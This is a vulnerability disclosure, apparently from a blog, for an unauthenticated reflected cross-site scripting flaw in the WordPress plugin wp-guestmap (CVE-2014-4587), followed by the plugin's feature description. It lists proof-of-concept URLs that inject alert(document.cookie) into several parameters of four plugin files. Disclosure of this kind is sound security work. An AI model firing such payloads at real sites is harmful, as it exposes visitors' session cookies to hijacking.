wp-plugin : wp-guestmap – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-guestmap

 

Effected Version : 1.8 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/wp-guestmap/guest-locator.php?zl=alert(document.cookie)&mt=alert(document.cookie)&activate=activate&dc=alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/online-tracker.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/stats-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

http://localhost/wp-content/plugins/wp-guestmap/weather-map.php?zl=zl'>alert(document.cookie)&mt=mt'>alert(document.cookie)&activate=activate'>alert(document.cookie)&dc=dc'>alert(document.cookie)&

Multiple Vulnerable Parameters found in all files.

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4587

 
Plugin Description :
 
[WP GuestMap in your own language](http://blog.codexpress.cn/wordpress/wp-guestmap-i18n/ "WP GuestMap Internationalization")

If you have some problems with it, please leave a comments [HERE](http://blog.codexpress.cn/php/wordpress-plugin-wp-guestmap/ "WP GuestMap Bug report")

The plugin is Google Map widget builder, currently three major widgets are supported:

* Guest Locator -- locate and display the current visitor on Google Map
* Online Tracker -- very similart to Guest Locator, except that it also show other online users
* Stats Map -- collect visitors' geolocation and make clouds on Google Map
* Weather Map -- show weather forecast of specific location on Google Map

It generates HTML codes, so that you can easily copy and paste it to sidebar widget or posts/pages. (To use it as a widget, go to **Presentation** ->**Widgets**, add a **Text Widgets** and paste the code there.)

**Guest Locator**

The simplest widget. Just put a welcome message (plain text or HTML), and the widget will locates your visitors and welcome them. Macros like %country%, %country_code%, %city%, %latitude% and %longitude% are available.

**Online Tracker**

Almost the same as **Guest Locator**, except that this widget also shows other online users, and refresh every minute. You have two extra tag %online_user_count% and  %online_other_user_count% besides those in **Guest Locator**.

[DEMO](http://blog.codexpress.cn/ "Online Tracker Demo")

**Stats Map**

This widget must be enabled to take effect. It loads little by little and finally displays all your visitors' location.

[DEMO](http://blog.codexpress.cn/guestmap/ "Stats Map Demo")

*Output Pagesize* is maximum output count each step(you needn't change it generally). *Date of Birth* is very useful option, only visitor visiting after the birthday will be shown on Stats Map. *Authentic Key* is a private key, with which you can subscribe statistics by RSS feed. A public Daily GeoRSS is also available.

[Public GeoRSS on Google Maps](http://maps.google.com/maps?f=q&ie=UTF8&z=2&q=http%3A%2F%2Fblog.codexpress.cn%2Fwp-content%2Fplugins%2Fwp-guestmap%2Ffeed.php%3Fvisual%3Denabled "WP GuestMap Daily GeoRSS")

**Weather Map**

This widget shows a simple weather report on Google Maps. You need to get your Google AJAX Feed API Key(From Google) and the location id (from Yahoo! Weather).


Upgrading & Other Infomation: please visit [http://blog.codexpress.cn/php/wordpress-plugin-wp-guestmap/](http://blog.codexpress.cn/php/wordpress-plugin-wp-guestmap/ "WP GuestMap Upgrade").

Leave a Reply

Your email address will not be published. Required fields are marked *